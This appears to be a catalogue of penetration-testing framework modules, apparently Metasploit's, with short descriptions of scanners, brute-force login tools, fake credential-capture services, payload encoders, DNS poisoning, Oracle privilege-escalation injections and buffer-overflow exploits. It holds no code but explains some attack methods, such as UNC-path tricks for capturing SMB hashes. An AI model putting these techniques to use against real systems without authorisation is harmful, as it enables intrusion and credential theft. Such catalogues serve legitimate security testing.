This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

FTP Version Scanner
Detect FTP Version.

Apache Axis2 v1.4.1 Local File Inclusion
This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. By loading a local XML file which contains a cleartext username and password, attackers can trivially recover authentication credentials to Axis services. http://www.exploit-db.com/exp... OSVDB-59001

Apache Axis2 v1.4.1 Brute Force Utility
This module attempts to log in to an Apache Axis2 v1.4.1 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

HTTP Backup File Scanner
This module identifies the existence of possible copies of a specific file in a given path.

HTTP Blind SQL Injection GET QUERY Scanner
This module identifies the existence of blind SQL injection issues in GET query parameter values.

HTTP Directory Brute Force Scanner
This module identifies the existence of interesting directories by brute forcing the name in a given directory path.

HTTP SSL Certificate Checker
This module will check the certificate of the specified web servers to ensure the subject and issuer match the supplied pattern and that the certificate is not expired. Note: Be sure to check your expression if using msfcli, shells tend to not like certain things and will strip/interpret them (= is a perfect example). It is better to use in console.

HTTP Copy File Scanner
This module identifies the existence of possible copies of a specific file in a given path.

HTTP Directory Listing Scanner
This module identifies directory listing vulnerabilities in a given directory path.

HTTP Directory Scanner
This module identifies the existence of interesting directories in a given directory path.

MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
This module is based on et's HTTP Directory Scanner module, with one exception. Where authentication is required, it attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication. MSB-MS09-020 CVE-2009-1535 CVE-2009-1122 OSVDB-54555 BID-34993

Pull Del.icio.us Links (URLs) for a domain
This module pulls and parses the URLs stored by Del.icio.us users for the purpose of replaying them during a web assessment, finding unlinked and old pages.

Pull Archive.org stored URLs for a domain
This module pulls and parses the URLs stored by Archive.org for the purpose of replaying them during a web assessment, finding unlinked and old pages.

HTTP Error Based SQL Injection Scanner
This module identifies the existence of error-based SQL injection issues. Still requires a lot of work.

HTTP File Same Name Directory Scanner
This module identifies the existence of files in a given directory path that have the same name as the directory. Only works if PATH is different from '/'.

HTTP Interesting File Scanner
This module identifies the existence of interesting files in a given directory path.

FrontPage Server Extensions Login Utility
This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed. http://en.wikipedia.org/wiki/... http://msdn2.microsoft.com/en...

HTTP Login Utility
This module attempts to authenticate to an HTTP service.

HTTP Version Detection
Display version information about each system

JBoss Vulnerability Scanner
This module scans a JBoss instance for a few vulnerabilities. CVE-2010-0738

LiteSpeed Source Code Disclosure/Download
This module exploits a source code disclosure/download vulnerability in versions 4.0.14 and prior of LiteSpeed. CVE-2010-2333 OSVDB-65476 BID-40815 http://www.exploit-db.com/exp...

HTTP Microsoft SQL Injection Table XSS Infection
This module implements the mass SQL injection attack seen in the wild lately: it concatenates an HTML string onto table contents, forcing a persistent XSS attack that redirects the user's browser to an attacker-controlled website.

MS09-020 IIS6 WebDAV Unicode Auth Bypass
Simplified version of MS09-020 IIS6 WebDAV Unicode Auth Bypass scanner. It attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication. MSB-MS09-020 CVE-2009-1535 CVE-2009-1122 OSVDB-54555 BID-34993

Nginx Source Code Disclosure/Download
This module exploits a source code disclosure/download vulnerability in versions of the nginx web server between 0.7.56 and 0.8.40 (inclusive). CVE-2010-2263 OSVDB-65531 BID-40760

HTTP Open Proxy Detection
Checks if an HTTP proxy is open. False positives are avoided by verifying the HTTP return code and matching a pattern. http://en.wikipedia.org/wiki/... http://nmap.org/svn/scripts/h...

HTTP Options Detection
Display available HTTP options for each system

HTTP Previous Directory File Scanner
This module identifies files in the first parent directory with the same name as the given directory path. Example: testing /backup/files/ will look for files such as /backup/files.ext.

HTTP File Extension Scanner
This module identifies the existence of additional files by modifying the extension of an existing file.

HTTP Robots.txt Content Scanner
Detect robots.txt files and analyze their content.

HTTP SOAP Verb/Noun Brute Force Scanner
This module attempts to brute force SOAP/XML requests to uncover hidden methods.

SQLMAP SQL Injection External Module
This module launches a sqlmap session. sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve the DBMS session user and database, enumerate users, password hashes, privileges and databases, dump entire or user-specific DBMS tables/columns, run their own SQL SELECT statement, read specific files on the file system and much more. http://sqlmap.sourceforge.net

HTTP SSL Certificate Information
Parse the server SSL certificate to obtain the common name and signature algorithm

HTTP Subversion Scanner
Detect Subversion directories and files and analyze their content. Only SVN version > 7 is supported.

Apache Tomcat User Enumeration
Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 6.0.20, 5.5.28, and 4.1.40. BID-35196 CVE-2009-0580 OSVDB-55055

Tomcat Application Manager Login Utility

HTTP trace.axd Content Scanner
Detect trace.axd files and analyze their content.

HTTP Verb Authentication Bypass Scanner
This module tests for authentication bypass using different HTTP verbs.

HTTP Virtual Host Brute Force Scanner
This module tries to identify unique virtual hosts hosted by the target web server.

VMware Server Directory Traversal Vulnerability
This module exploits the VMware Server directory traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5, which allows remote attackers to read arbitrary files. Common VMware Server ports are 80/8222 (plain) and 443/8333 (SSL). If you want to download the entire VM, check out the gueststealer tool. http://www.vmware.com/securit... OSVDB-59440 BID-36842 CVE-2009-3733 http://fyrmassociates.com/too...

HTTP Vuln scanner
This module identifies common vulnerable files or cgis.

HTTP WebDAV Internal IP Scanner
Detect web servers' internal IPs through WebDAV.

HTTP WebDAV Scanner
Detect webservers with WebDAV enabled

HTTP WebDAV Website Content Scanner
Detect web servers disclosing their content through WebDAV.

Wordpress Brute Force and User Enumeration Utility
Wordpress Authentication Brute Force and User Enumeration Utility BID-35581 CVE-2009-2335 OSVDB-55713

HTTP Writable Path PUT/DELETE File Access
This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.

HTTP Blind XPATH 1.0 Injector
This module exploits blind XPATH 1.0 injections over HTTP GET requests.

IMAP4 Banner Grabber
IMAP4 Banner Grabber

IPID Sequence Scanner
This module will probe hosts' IPID sequences and classify them using the same method Nmap uses when it's performing its IPID Idle Scan (-sI) and OS Detection (-O). Nmap's probes are SYN/ACKs while this module's are SYNs. While this does not change the underlying functionality, it does change the chance of whether or not the probe will be stopped by a firewall. Nmap's Idle Scan can use hosts whose IPID sequences are classified as "Incremental" or "Broken little-endian incremental".

Lotus Domino Password Hash Collector
Get user password hashes from the names.nsf page.

Lotus Domino Brute Force Utility
Lotus Domino Authentication Brute Force Utility

Lotus Domino Version
Several checks to determine Lotus Domino Server Version.

Borland InterBase Services Manager Information
This module retrieves the version of the Services Manager, and the version and implementation of the InterBase server, from the InterBase Services Manager.

SunRPC Portmap Program Enumerator
This module calls the target portmap service and enumerates all program entries and their running port numbers. http://www.ietf.org/rfc/rfc10...

Motorola Timbuktu Service Detection.
This module simply sends a packet to the Motorola Timbuktu service for detection.

MSSQL Login Utility
This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

MSSQL Ping Utility
This module simply queries the MSSQL instance for information.

MySQL Login Utility
This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

MySQL Server Version Enumeration
Enumerates the version of MySQL servers

NetBIOS Information Discovery
Discover host information through NetBIOS

NetBIOS Information Discovery Prober
Discover host information using sequential NetBIOS Probes

NFS Mount Scanner
This module scans NFS mounts and their permissions. CVE-1999-0170 http://www.ietf.org/rfc/rfc10...

NTP Monitor List Scanner
Obtain the list of recent clients from an NTP server

Oracle Enterprise Manager Control SID Discovery
This module makes a request to the Oracle Enterprise Manager Control Console in an attempt to discover the SID. http://dsecrg.com/files/pub/p...

Oracle SID Enumeration.
This module simply queries the TNS listener for the Oracle SID. With Oracle 9.2.0.8 and above the listener will be protected and the SID will have to be brute-forced or guessed.

Oracle Application Server Spy Servlet SID Enumeration.
This module makes a request to the Oracle Application Server in an attempt to discover the SID. http://dsecrg.com/files/pub/p...

Oracle tnslsnr Service Version Query.
This module simply queries the tnslsnr service for the Oracle build.

Oracle XML DB SID Discovery
This module simply makes an authenticated request to retrieve the SID from the Oracle XML DB httpd server. http://dsecrg.com/files/pub/p...

Oracle XML DB SID Discovery via Brute Force
This module attempts to retrieve the SID from the Oracle XML DB httpd server, utilizing Pete Finnigan's default Oracle password list. http://dsecrg.com/files/pub/p... http://www.petefinnigan.com/d...

POP3 Banner Grabber
POP3 Banner Grabber

TCP ACK Firewall Scanner
Map out firewall rulesets with a raw ACK scan. Any unfiltered ports found means a stateful firewall is not in place for them.

FTP Bounce Port Scanner
Enumerate TCP services via the FTP bounce PORT/LIST method, which can still come in handy every once in a while (I know of a server that still allows this just fine...).

TCP SYN Port Scanner
Enumerate open TCP services using a raw SYN scan.

TCP Port Scanner
Enumerate open TCP services

TCP "XMas" Port Scanner
Enumerate open|filtered TCP services using a raw "XMas" scan; this sends probes containing the FIN, PSH and URG flags.

PostgreSQL Login Utility
This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. http://www.postgresql.org

PostgreSQL Version Probe
Enumerates the version of PostgreSQL servers. www.postgresql.org

Rogue Gateway Detection: Receiver
This module listens for replies to the requests sent by the rogue_send module. The RPORT, CPORT, and ECHOID values must match the rogue_send parameters used exactly. http://www.metasploit.com/res...

Rogue Gateway Detection: Sender
This module sends a series of TCP SYN and ICMP ECHO requests to each internal target host, spoofing the source address of an external system running the rogue_recv module. This allows the system running the rogue_recv module to determine what external IP a given internal system is using as its default route. http://www.metasploit.com/res...

SIP Username Enumerator (UDP)
Scan for numeric username/extensions using OPTIONS/REGISTER requests

SIP Username Enumerator (TCP)
Scan for numeric username/extensions using OPTIONS/REGISTER requests

SIP Endpoint Scanner (UDP)
Scan for SIP devices using OPTIONS requests

SIP Endpoint Scanner (TCP)
Scan for SIP devices using OPTIONS requests

SMB Session Pipe Auditor
Determine what named pipes are accessible over SMB

SMB Session Pipe DCERPC Auditor
Determine what DCERPC services are accessible over an SMB pipe

SMB 2.0 Protocol Detection
Detect systems that support the SMB 2.0 protocol

SMB Share Enumeration
Determine what shares are provided by the SMB service

SMB User Enumeration (SAM EnumUsers)
Determine what local users exist via the SAM RPC service

SMB Login Check Scanner
This module will test an SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.

SMB Local User Enumeration (LookupSid)
Determine what local users exist via brute force SID lookups

SMB Version Detection
Display version information about each system

SMTP User Enumeration Utility
The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual addresses behind user aliases and mailing lists). Where these SMTP commands are implemented, they can reveal a list of valid users. http://www.ietf.org/rfc/rfc28... OSVDB-12551 CVE-1999-0531

SMTP Banner Grabber

AIX SNMP Scanner Auxiliary Module
AIX SNMP Scanner Auxiliary Module

SNMP Community Scanner
Scan for SNMP devices using common community names

SSH Login Check Scanner
This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

SSH Public Key Login Scanner
This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Note that password-protected key files will not function with this module -- it is designed specifically for unencrypted (passwordless) keys. Key files may be a single private (unencrypted) key, or several private keys concatenated together as an ASCII text file. Non-key data should be silently ignored.

SSH Version Scanner

Wardialer
Scan for dial-up systems that are connected to modems and answer telephony indials.

Telnet Login Check Scanner
This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Telnet Service Banner Detection
Detect telnet services

TFTP Brute Forcer
This module uses a dictionary to brute force valid TFTP image names from a TFTP server.

VNC Authentication None Detection

X11 No-Auth Scanner
This module scans for X11 servers that allow anyone to connect without authentication. OSVDB-309 CVE-1999-0526

HTTP Client Automatic Exploiter
This module uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them.

Authentication Capture: FTP
This module provides a fake FTP service that is designed to capture authentication credentials.

Authentication Capture: HTTP
This module provides a fake HTTP service that is designed to capture authentication credentials.

HTTP Client MS Credential Catcher
This module attempts to quietly catch NTLM/LM Challenge hashes.

Authentication Capture: IMAP
This module provides a fake IMAP service that is designed to capture authentication credentials.

Authentication Capture: POP3
This module provides a fake POP3 service that is designed to capture authentication credentials.

Authentication Capture: SMB
This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force an SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

Authentication Capture: SMTP
This module provides a fake SMTP service that is designed to capture authentication credentials.

Authentication Capture: Telnet
This module provides a fake Telnet service that is designed to capture authentication credentials. DONTs and WONTs are sent to the client for all option negotiations, except for ECHO at the time of the password prompt since the server controls that for a bit more realism.

DNS Spoofing Helper Service
This module provides a DNS service that returns TXT records indicating information about the querying service. Based on Dino Dai Zovi's DNS code from Karma.

Fake DNS Service
This module provides a DNS service that redirects all queries to a particular address.

File Format Exploit Generator
This module generates a combination of file format exploits and makes them available to a client. 94.7% based on browser autopwn by egypt.

FTP File Server
This module provides an FTP service.

SOCKS Proxy UNC Path Redirection
This module provides a SOCKS proxy service that redirects all HTTP requests to a web page that loads a UNC path.

TFTP File Server
This module provides a TFTP service.

pSnuffle Packet Sniffer
This module sniffs passwords like dsniff did in the past.

Forge Cisco DTP Packets
This module forges DTP packets to initialize a trunk port.

DNS BailiWicked Domain Attack
This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target domain's nameserver entries in a vulnerable DNS cache server. This attack works by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and the nameserver entries for the target domain will be replaced by the server specified in the NEWDNS option of this exploit. CVE-2008-1447 OSVDB-46776 US-CERT-VU-800113 http://www.caughq.org/exploit...

DNS BailiWicked Host Attack
This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached. CVE-2008-1447 OSVDB-46776 US-CERT-VU-800113 http://www.caughq.org/exploit...

DNS Lookup Result Comparison
This module can be used to determine differences in the cache entries between two DNS servers. This is primarily useful for detecting cache poisoning attacks, but can also be used to detect geo-location loadbalancing.

Airpwn TCP hijack
TCP streams are 'protected' only in so much as the sequence number is not guessable. Wifi is shared media. Got your nose. Responses which do not begin with Header: Value are assumed to be HTML only and will have Header:Value data prepended. Responses which do not include a Content-Length header will have one generated.

DNSpwn DNS hijack
Race DNS responses and replace DNS queries

SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE
The module exploits an SQL injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with the October 2008 CPU. CVE-2008-3996 OSVDB-49321 http://www.appsecinc.com/reso...

SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE
The module exploits an SQL injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with the October 2008 CPU. CVE-2008-3995 OSVDB-49320 http://www.appsecinc.com/reso...

SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE
The module exploits an SQL injection flaw in the DROP_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. CVE-2010-0870 OSVDB-63772 http://www.oracle.com/technol...

SQL Injection via DBMS_EXPORT_EXTENSION.
This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2. CVE-2006-2081 OSVDB-25002 BID-17699 http://www.red-database-secur...

SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML.
This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function. http://www.metasploit.com

SQL Injection via SYS.DBMS_METADATA.GET_XML.
This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.DBMS_METADATA.GET_XML package/function. http://www.metasploit.com

SQL Injection via SYS.DBMS_METADATA.OPEN.
This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.DBMS_METADATA.OPEN package/function. http://www.metasploit.com

SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger.
This module will escalate an Oracle DB user to MDSYS by exploiting an SQL injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that, the exploit escalates the user to DBA using the "CREATE ANY TRIGGER" privilege granted to the MDSYS user, by creating an evil trigger in the SYSTEM schema (2-stage attack). CVE-2008-3979 OSVDB-51354 http://www.securityfocus.com/... http://www.ngssoftware.com/

DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution
This module exploits a flaw (0-day) in the DBMS_JVM_EXP_PERMS package that allows any user with the CREATE SESSION privilege to grant themselves Java IO privileges. Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only). CVE-2010-0866 OSVDB-62184 http://blackhat.com/html/bh-d... http://www.notsosecure.com/fo...

DBMS_JVM_EXP_PERMS 11g R1/R2 OS Code Execution
This module exploits a flaw (0-day) in the DBMS_JVM_EXP_PERMS package that allows any user with the CREATE SESSION privilege to grant themselves Java IO privileges. Identified by David Litchfield. Works on 11g R1 and R2 (Windows only). CVE-2010-0866 OSVDB-62184 http://blackhat.com/html/bh-d... http://www.notsosecure.com/fo...

SQL Injection via SYS.LT.COMPRESSWORKSPACE.
This module exploits an SQL injection flaw in the COMPRESSWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. CVE-2008-3982 OSVDB-49324 http://www.oracle.com/technol... http://www.appsecinc.com/reso...

SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.LT.FINDRICSET package via the Evil Cursor technique. Tested on Oracle 10.1.0.3.0; should work through 10.1.0.5.0 and supposedly on 11g. Fixed with the Oracle Critical Patch Update of October 2007. CVE-2007-5511 OSVDB-40079 BID-26098 http://rawlab.mindcreations.c... http://www.oracle.com/technol...

SQL Injection via SYS.LT.MERGEWORKSPACE.
This module exploits an SQL injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. CVE-2008-3983 OSVDB-49325 http://www.oracle.com/technol... http://www.appsecinc.com/reso... http://www.dsecrg.com/pages/e...

SQL Injection via SYS.LT.REMOVEWORKSPACE.
This module exploits an SQL injection flaw in the REMOVEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. CVE-2008-3984 OSVDB-49326 http://www.appsecinc.com/reso...

SQL Injection via SYS.LT.ROLLBACKWORKSPACE.
This module exploits an sql injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. CVE-2009-0978 OSVDB-53734 http://www.oracle.com/technol...

Simple Network Capture Tester
This module sniffs HTTP GET requests from the network

Simple Ethernet Frame Spoofer
This module sends spoofed ethernet frames

FTP Client Exploit Mixin DATA test Exploit
This module tests the "DATA" functionality of the ftp client exploit mixin.

Simple IP Spoofing Tester
Simple IP Spoofing Tester

Simple Recon Module Tester
Simple Recon Module Tester

Simple Recon Module Tester
Simple Recon Module Tester

Simple Recon Module Tester
Simple Recon Module Tester

Simple Recon Module Tester
Simple Recon Module Tester

SIP Invite Spoof
This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.

Generic Shell Variable Substitution Command Encoder
This encoder uses standard Bourne shell variable substitution tricks to avoid commonly restricted characters.

Generic ${IFS} Substitution Command Encoder
This encoder uses standard Bourne shell variable substitution to avoid spaces without being overly fancy.

Generic printf(1) Utility Command Encoder
This encoder uses the printf(1) utility to avoid restricted characters. Some shell variable substitution may also be used if needed symbols are blacklisted.

The "none" Encoder
This "encoder" does not transform the payload in any way.

XOR Encoder
Mips Web server exploit friendly xor encoder

XOR Encoder
Mips Web server exploit friendly xor encoder

PHP Base64 encoder
This encoder returns a base64 string encapsulated in eval(base64_decode()), increasing the size by a bit more than one third.

PPC LongXOR Encoder
This encoder is ghandi's PPC dword xor encoder with some size tweaks by HDM.

PPC LongXOR Encoder
This encoder is ghandi's PPC dword xor encoder but uses a tag-based terminator rather than a length.

SPARC DWORD XOR Encoder
This encoder is optyx's 48-byte SPARC encoder with some tweaks.

XOR Encoder
An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.

Alpha2 Alphanumeric Mixedcase Encoder
Encodes payloads as alphanumeric mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite.

Alpha2 Alphanumeric Uppercase Encoder
Encodes payloads as alphanumeric uppercase text. This encoder uses SkyLined's Alpha2 encoding suite.

Avoid UTF8/tolower
UTF8 Safe, tolower Safe Encoder

Call+4 Dword XOR Encoder
Call+4 Dword XOR Encoder

CPUID-based Context Keyed Payload Encoder
This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.

stat(2)-based Context Keyed Payload Encoder
This is a Context-Keyed Payload Encoder based on stat(2) and Shikata Ga Nai.

time(2)-based Context Keyed Payload Encoder
This is a Context-Keyed Payload Encoder based on time(2) and Shikata Ga Nai.

Single-byte XOR Countdown Encoder
This encoder uses the length of the payload as a position-dependent encoder key to produce a small decoder stub.

Variable-length Fnstenv/mov Dword XOR Encoder
This encoder uses a variable-length mov equivalent instruction with fnstenv for getip.

Jump/Call XOR Additive Feedback Encoder
Jump/Call XOR Additive Feedback

Non-Alpha Encoder
Encodes payloads as non-alpha based bytes. This allows payloads to bypass both toupper() and tolower() calls, but will fail isalpha(). Table based design from Russel Sanford.

Non-Upper Encoder
Encodes payloads as non-alpha based bytes. This allows payloads to bypass tolower() calls, but will fail isalpha(). Table based design from Russel Sanford.

Polymorphic XOR Additive Feedback Encoder
This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction substitution and dynamic block ordering. Registers are also selected dynamically.

Single Static Bit
Static value for specific bit

Alpha2 Alphanumeric Unicode Mixedcase Encoder
Encodes payloads as unicode-safe mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite.

Alpha2 Alphanumeric Unicode Uppercase Encoder
Encodes payloads as unicode-safe uppercase text. This encoder uses SkyLined's Alpha2 encoding suite.

AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
This module exploits a buffer overflow vulnerability in opcode 21 handled by rpc.cmsd on AIX. By making a request with a long string passed to the first argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This leads to arbitrary code execution. NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where further attempts are not possible. CVE-2009-3699 OSVDB-58726 BID-36615 http://labs.idefense.com/inte... http://aix.software.ibm.com/a...

ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow
This module exploits a buffer overflow vulnerability in _tt_internal_realpath function of the ToolTalk database server (rpc.ttdbserverd). CVE-2009-2727 OSVDB-55151

Mercantec SoftCart CGI Overflow
This is an exploit for an undisclosed buffer overflow in the SoftCart.exe CGI as shipped with Mercantec's shopping cart software. It is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b. CVE-2004-2221 OSVDB-9011 BID-10926

System V Derived /bin/login Extraneous Arguments Buffer Overflow
This exploit connects to a system's modem over dialup and exploits a buffer overflow vulnerability in its System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments. CVE-2001-0797 OSVDB-690 OSVDB-691 BID-3681 http://archives.neohapsis.com... http://archives.neohapsis.com...

Samba trans2open Overflow (*BSD x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. CVE-2003-0201 OSVDB-4469 BID-7294 http://seclists.org/bugtraq/2...

XTACACSD <= 4.1.2 report() Buffer Overflow
This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By sending a specially crafted XTACACS packet with an overly long username, an attacker may be able to execute arbitrary code. CVE-2008-7232 OSVDB-58140 http://aluigi.altervista.org/...

HP-UX LPD Command Execution
This exploit abuses an unpublished vulnerability in the HP-UX LPD service. This flaw allows an unauthenticated attacker to execute arbitrary commands with the privileges of the root user. The LPD service is only exploitable when the address of the attacking system can be resolved by the target. This vulnerability was silently patched with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213. CVE-2002-1473 OSVDB-9638 http://archives.neohapsis.com...

Irix LPD tagprinter Command Execution
This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Irix. CVE-2001-0800 OSVDB-8573 http://www.lsd-pl.net/code/IR...

Unreal Tournament 2004 "secure" Overflow (Linux)
This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times. CVE-2004-0608 OSVDB-7217 BID-10570

Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
This module abuses a metacharacter injection vulnerability in the HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker to execute arbitrary commands by specifying shell metacharacters as the 'user' within the 'ping' action to obtain 'httpd' user access. This module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response. OSVDB-40521 BID-25694 CVE-2007-3010 http://www1.alcatel-lucent.co...

DD-WRT HTTP Daemon Arbitrary Command Execution
This module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. CVE-2009-2765 OSVDB-55990 BID-35742 http://www.milw0rm.com/exploi...

Berlios GPSD Format String Vulnerability
This module exploits a format string vulnerability in the Berlios GPSD server. This vulnerability was discovered by Kevin Finisterre. CVE-2004-1388 OSVDB-13199 BID-12371 http://www.securiteam.com/uni...

Linksys apply.cgi buffer overflow
This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. According to iDefense, who discovered this vulnerability, all WRT54G versions prior to 4.20.7 and all WRT54GS versions prior to 1.05.2 may be affected. CVE-2005-2799 OSVDB-19389 http://labs.idefense.com/inte...

PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)
This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters. CVE-2006-1148 OSVDB-23777 BID-17040 http://www.infigo.hr/in_focus...

RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
This module abuses two flaws - a metacharacter injection vulnerability in the HTTP management server of RedHat 6.2 systems running the Piranha LVS cluster service and GUI (rpm packages: piranha and piranha-gui). The vulnerability allows an authenticated attacker to execute arbitrary commands as the Apache user account (nobody) within the /piranha/secure/passwd.php3 script. The package installs with a default user and password of piranha:q which was exploited in the wild. CVE-2000-0248 OSVDB-289 BID-1148 CVE-2000-0322 OSVDB-1300 BID-1149

Snort Back Orifice Pre-Preprocessor Remote Exploit
This module exploits a stack buffer overflow in the Back Orifice pre-processor module included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could be used to completely compromise a Snort sensor, and would typically gain an attacker full root or administrative privileges. CVE-2005-3252 OSVDB-20034 BID-15131 http://xforce.iss.net/xforce/...

UoW IMAP server LSUB Buffer Overflow
This module exploits a buffer overflow in the 'LSUB' command of the University of Washington IMAP service. This vulnerability can only be exploited with a valid username and password. CVE-2000-0284 OSVDB-12037 BID-1110 http://www.milw0rm.com/exploi...

Madwifi SIOCGIWSCAN Buffer Overflow
